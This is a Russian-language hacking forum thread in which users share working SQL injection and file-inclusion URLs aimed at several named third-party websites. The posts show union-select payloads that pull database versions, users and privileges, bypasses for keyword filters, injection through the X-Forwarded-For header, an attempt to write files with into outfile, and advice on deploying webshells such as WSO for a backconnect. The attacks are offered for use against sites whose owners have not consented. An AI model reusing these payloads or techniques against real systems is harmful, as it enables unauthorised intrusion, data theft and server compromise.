Если у Вас используется php >5.3, то там данная дыра уже закрыта MQ=Off ?? _ttp://mreseo.com/hosting.php?id=../123.php%00 Так что вернёт ??? На основании чего такие предположения ?
Скорее всего юзер ограничен своей директорией. Code: /home/content/28/9889628/html/mreseo/ Code: ?id=../123%00 Failed opening 'pages/../123\0.php'
Причем здесь ограничения в директории? Ответ уже был дан: версия php 5.3, ////4096/// не прокатит, как и %00 из-за настрек в php.ini, поэтому расширение .php вы не как не отбросите. ПРУФ: ?id=../index
Ещё интересна возможность раскрутки такой скули. Code: _ttps://www.trimaxcloud.com/partner.php?id=7'&idsub=39' Кавычки экранирует, вывода нет. Всё что есть - раскрытие путей Code: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in C:\wamp2\www\partner.php on line 10 По тому же дорку: Code: _ttp://www.tcilmanagedservices.com/partner.php?id=7'&idsub=39' P.S. Какой шелл лучше использовать для windows? WSO не поддерживает командную строку в вин, как я вижу.
Вот нашел скрипт, позволяющий, как мне кажется то-ли залить файл на сервер, то-ли запустить скрипт. Но моих познаний явно не хватает для оценки его возможностей: Code: <?php loggedinorreturn(); if (!isset ($_POST['title'])) { if ($CURUSER['cs_last_type'] > 0) $c = '<script> $(function() { $("select[name=type]").val ('.$CURUSER['cs_last_type'].') }); </script>'; $c .='<form method="POST"> Заголовок: <input type="text" name="title" style="width: 100%"> Тип: <select name="type" style="width: 100%">'.$o.'<select> Отрывок: <textarea style="width: 100%; height: 500px;" name="text"></textarea><BR> <input type="submit" value="Сохранить"> </form>'; $title = 'Добавить код'; } else { $text = $_POST['text']; $title = strip_tags ($_POST['title']); $type = intval ($_POST['type']); include ('include/geshi.php'); $language = strtolower ($types[$type]); $path = 'include/geshi/'; $geshi = new GeSHi($text, $language, $path); $geshi->enable_line_numbers (GESHI_FANCY_LINE_NUMBERS); $geshi->set_tab_width (4); $hltext = $geshi->parse_code(); sql_query ("INSERT INTO `codeshare` SET `title` = ".sqlesc ($title).", `user_id` = ".$CURUSER['id'].", `type` = ".$type.", `size` = ".mb_strlen ($text)." "); $id = mysql_insert_id (); sql_query ("INSERT INTO `codeshare_data` SET `id` = ".$id.", `text` = ".sqlesc (htmlspecialchars ($text, ENT_COMPAT, 'UTF-8')).", `hltext` = ".sqlesc ($hltext)." ");//or die (mysql_error ()); sql_query ('UPDATE `users` SET `cs_last_type` = '.$type.' WHERE `id` = '.$CURUSER['id']); header ('Location: /codeshare.php?id='.$id); die (); } ?> Если он может выполнять другой код, то мне достаточно провести инъекцию и выполнить ее используя этот скрипт. Подскажите, как это сделать, или укажите утилиту, которая может проанализировать код на уязвимость Спасибо
Бред пишешь. _ttps://www.trimaxcloud.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1,@@version,3,4+--+ _ttp://www.tcilmanagedservices.com/partner.php?idsub=39&id=7'+and+1=2+union+select+1,@@version,3,4+--+ Тем же WSO сделай бэкконект и сиди со своей консольки. Ещё как альтернативу юзаю P.A.S. шелл.
Есть SQLi Code: http://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,2,3,table_name+from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61--+ В ответ получаю Не могу вкурить в чем проблема
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@version,3,4 _ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@version,3,4+from+dual+--+ Вердикт неутешителен - фильтруется "точка" Замены типа %2e и %252e не помогают.
_http://www.lory-press.ru/showreview.php?id=9999999999999.9+order+by+4+--+ А почему тут не фильтруется?
Ты не прав, скорее всего база пуста. В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост" В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает Пруф>>> _tp://www.lory-press.ru/showreview.php?id=9999999999999.9+union+select+1,user%28%29,3,4+--+
Проверил ещё раз. Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema _ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@version,3,4+from+lory.books+--+ File_Priv=N _ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4+from+lory.books+into+outfile+'/tmp/1.txt'+--+
И правда, но кое что есть Data Found: Host:Userassword:Update_priv:Insert_priv:Select_priv:Create_user_priv:Grant_privelete_privrop_priv:Create_priv:File_priv localhost:root: :Y:Y:Y:Y:Y:Y:Y:Y:N PS чтото получше sqlihelpera для дампа есть?
господа, приветствую. Вот sqlmap'ом посотрел список юзеров mysql там есть помимо прочих и такие: [*] cacti [1]: [*] debian-sys-maint [1]: [*] f2 [1]: [*] frontend [1]: [*] replication [1]: [*] wizard [1]: есть ли для них дефалтовые пароли? Что это вообще за движок передо мной судя по набору юзеров?
http://sahyadhri.com/tourism/cities.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+ как обойти блок select ??
Вопрос знатокам. Если Havij и Sqlmap не справляются, а уязвимость sql-inj есть, есть ли третий вариант?
http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14)+--+ тут фильтрация связки union+select , а не только select
Нашел sqli в хттп заголовках X-Forwarded-For: Когда сделал запрос X-Forwarded-For: ' order by 2# мне ответили: General Error This account disabled Потом X-Forwarded-For: ' order by 3# и мне ответили: General Error SQL ERROR [ mysql4 ] Unknown column '3' in 'order clause' [1054] Я так понял, что там всего 2 поля... Но когда вбиваю X-Forwarded-For: ' union select 1,2# мне пишут мол General Error SQL ERROR [ mysql4 ] Unknown table 's' in field list [1109] как раскрутить?
Code: _ttp://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,%28user%28%29%29,%28version%28%29%29,%28database%28%29%29,5,6,7,8,9,10,11,12,13,14%29+--+
Code: http://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,2,3,4,5,6,7,8,9,10,11,12,13,14%29+from+information_schema.tables+--+ А обойти 403 в таком запросе получиться??
